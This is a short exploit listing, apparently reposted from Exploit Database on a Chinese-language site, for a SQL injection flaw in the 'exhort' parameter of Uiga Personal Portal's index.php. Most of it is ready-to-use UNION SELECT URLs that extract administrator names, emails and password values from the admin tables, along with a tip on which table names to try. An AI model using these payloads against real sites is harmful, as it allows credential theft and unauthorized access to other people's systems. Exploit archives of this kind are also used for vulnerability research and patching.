Uiga Personal Portal – ‘index.php’ ‘view’ SQL Injection

• Exploit Database
• 36 阅读

• 作者： 41.w4r10r
  日期： 2010-04-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12399/

• # Exploit Title: Uiga Personal Portal index.php (view) SQL Injection
  Vulnerability
  # Date: 27-4-2010
  # Author: 41.w4r10r
  # Software Link :
  http://www.scriptdevelopers.net/download/uigapersonalportal.zip
  # Version: Web Application
  # Tested on: Apcahe/Unix
  # CVE : [if exists]
  # Dork :
  # Code :
  
  
  
  Exploited Link :
  
  http://[site]/uigaportal/index.php?view=ar_det&exhort=-36'
  
  Examples :
  
  http://[site]/product/demo/uigaportal/index.php?view=ar_det&exhort=-36+union+select+all+1,2,3,4,5,6,gr
  
  oup_concat(admin_name,0x3a,admin_password),8,9,10,11+from+admin--
  
  http://[site]/index.php?view=ar_det&exhort=-36+union+select+all+1,2,3,4,5,6,group_concat(admin_ema
  
  il,0x3a,admin_password),8,9,10,11+from+tbl_admin--
  
  Important: Sometimes the table name is administrators and sometimes its
  admin